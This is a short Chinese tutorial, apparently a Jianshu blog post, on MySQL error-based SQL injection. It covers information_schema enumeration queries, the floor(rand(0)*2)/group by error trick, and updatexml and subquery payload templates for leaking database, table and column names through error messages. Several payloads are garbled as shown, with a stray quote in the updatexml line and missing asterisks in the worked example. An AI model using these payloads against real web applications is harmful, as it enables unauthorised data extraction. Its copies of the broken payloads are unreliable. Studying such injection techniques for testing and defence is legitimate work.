sql簡單的報(bào)錯(cuò)查詢

關(guān)于INFORMATION_SCHEMA表的簡單介紹
  information_schema   :數(shù)據(jù)庫是MySQL系統(tǒng)自帶的數(shù)據(jù)庫,它提供了數(shù)據(jù)庫元數(shù)據(jù)的訪問方式。

information_schema 數(shù)據(jù)庫中注入時(shí)要用到的表有( schemata tables columns)

                        chemata 表中   字段
                                 schema_name      存放數(shù)據(jù)庫名
                        tables  表中   字段
                                 table_schema       數(shù)據(jù)表所屬的數(shù)據(jù)庫名
                                 table_name          存放數(shù)據(jù)庫所有表名
                        columns  表中  字段
                                 table_schema       數(shù)據(jù)表所屬的數(shù)據(jù)庫名
                                 table_name          存放數(shù)據(jù)庫所有表名
                                 column_name      存放數(shù)據(jù)庫所有表里面的列名

SQL注入時(shí)常用到的幾條查詢語句

                  查找數(shù)據(jù)庫名稱
                          select schema_name from information_schema.schemata   相當(dāng)于   show databases;
                  查mysqllname所有表名
                        select table_name from information_schema.tables where table_schema=mysqlname
                  查詢mysqlname數(shù)據(jù)庫tablename表中的所有字段
                        select column_name from information_schema.columns where table_schema="mysqlname" and table_name="tablename"
報(bào)錯(cuò)注入原理:

由于rand和group+by的沖突,即rand()是不可以作為order by的條件字段,同理也不可以為group by的條件字段。
  floor(rand(0)*2) 獲取不確定又重復(fù)的值造成mysql的錯(cuò)誤
  floor:向下取整,只保留整數(shù)部分,rand(0) -> 0~1

報(bào)錯(cuò)注入特點(diǎn):
                 頁面上沒有顯示位,但是有SQL語句執(zhí)行錯(cuò)誤信息

報(bào)錯(cuò)語句可以分為MYSQL報(bào)錯(cuò)


01.PNG

PHP報(bào)錯(cuò)


02.PNG

常用語句 
                            and updatexml (1,payload'1)
                          
                            and updatexml (1,concat(0x7e,payload,0x7e),1)      0x7e  是: 轉(zhuǎn)碼來的


                            (select 1 from (select count(*),concat((payload),floor(rand(0)*2))x from information_schema.tables group by x)a)

這里的concat(payload)是關(guān)鍵語句 一般都是在這里爆數(shù)據(jù)庫,表和字段
如:
(select 1 from (select count(),concat((database()),floor(rand(0)2))x from information_schema.tables group by x)a)
這是爆數(shù)據(jù)庫名

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡書系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

  • Sql注入定義: 就是通過把sql命令插入到web表單提交或輸入域名或頁面請求的查詢字符串,最終達(dá)到欺騙服務(wù)器執(zhí)行...
    付出從未后悔閱讀 757評論 0 3
  • 注: 以下payload均基于單引號字符型注入。若是整型注入,需將單引號與后面的注釋符(--+)都去掉;若是雙引號...
    就是愛文藝閱讀 6,385評論 1 4
  • http://127.0.0.1/sqli-labs-master 淺析MySQL中concat以及group_c...
    BerL1n閱讀 8,779評論 0 4
  • 目錄: 0x00 mysql一般注入(select) 0x01 mysql一般注入(insert、update) ...
    JasonChiu17閱讀 2,126評論 0 0
  • 2017年中醫(yī)科在各級領(lǐng)導(dǎo)的正確領(lǐng)導(dǎo)、兄弟科室的支持和科室人員的共同努力下,在提供原有中醫(yī)特色服務(wù)的基礎(chǔ)上,不斷提...
    古典悠夢閱讀 1,903評論 2 2

友情鏈接更多精彩內(nèi)容